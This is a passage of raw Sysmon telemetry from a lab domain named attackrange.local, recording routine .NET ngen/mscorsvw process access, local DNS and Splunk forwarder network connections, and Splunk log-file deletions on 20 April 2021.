14:57:35.624{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDF-607E-F40C-00000000BB01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.561{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDF-607E-F30C-00000000BB01}2308C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.545{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBDF-607E-F30C-00000000BB01}2308C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.545{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDF-607E-F30C-00000000BB01}2308C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.499{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDF-607E-F20C-00000000BB01}4028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.483{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDF-607E-F20C-00000000BB01}4028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.483{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDF-607E-F20C-00000000BB01}4028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.436{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDF-607E-F10C-00000000BB01}3628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.420{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDF-607E-F10C-00000000BB01}3628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.420{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDF-607E-F10C-00000000BB01}3628C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.358{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDF-607E-F00C-00000000BB01}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.342{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDF-607E-F00C-00000000BB01}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.342{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDF-607E-F00C-00000000BB01}5116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.280{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDF-607E-EF0C-00000000BB01}1560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.264{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBDF-607E-EF0C-00000000BB01}1560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.264{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDF-607E-EF0C-00000000BB01}1560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.233{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBDF-607E-EE0C-00000000BB01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.217{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBDF-607E-EE0C-00000000BB01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.217{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBDF-607E-EE0C-00000000BB01}4708C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000075055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.710{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53858- 354300x800000000000000075054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.285{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57538-false10.0.1.12-8000- 354300x800000000000000075053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:32.943{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local58347- 10341000x800000000000000075052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.186{A7A01FEF-EBCF-607E-C00B-00000000BB01}65486336C:\Windows\system32\conhost.exe{A7A01FEF-EBDF-607E-ED0C-00000000BB01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.186{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBDF-607E-ED0C-00000000BB01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.186{A7A01FEF-EBCF-607E-BF0B-00000000BB01}44886480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{A7A01FEF-EBDF-607E-ED0C-00000000BB01}7120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+35491|UNKNOWN(00007FF803265A07) 23542300x800000000000000075049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.139{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BE54B644DA1EDD415E8DD820AE87E272,SHA256=F6F852336ED80EB1357FE5666E400F2267A934BA239CA0BC0B850E2F66C22860,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000075048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:35.139{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=2D96B81F1DEB626C99D3AB504B336025,SHA256=61815C982484A478EBF91CEA72EB5C666E104201764146E64AADDA9A6CD160BD,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050291Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:32.649{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 